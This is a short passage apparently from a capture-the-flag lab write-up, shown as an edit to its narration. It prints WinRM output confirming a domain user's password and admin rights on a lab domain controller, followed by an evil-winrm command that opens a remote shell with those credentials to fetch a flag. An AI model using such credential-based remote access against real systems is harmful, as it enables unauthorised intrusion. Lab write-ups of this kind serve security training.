Skip to main content

 WINRM 10.129.234.50 5985 DC [+] redelegate.vl\Helen.Frost:Elliot1234! (admin)

 Great!
-She has admin access.
-Let me connect with Evil-WinRM for an interactive shell and grab the user flag.
+Admin access confirmed.
+Connecting with Evil-WinRM for an interactive shell to grab the user flag.

 elliot@exegol:~$ evil-winrm -i redelegate.vl -u Helen.Frost -p 'Elliot1234!'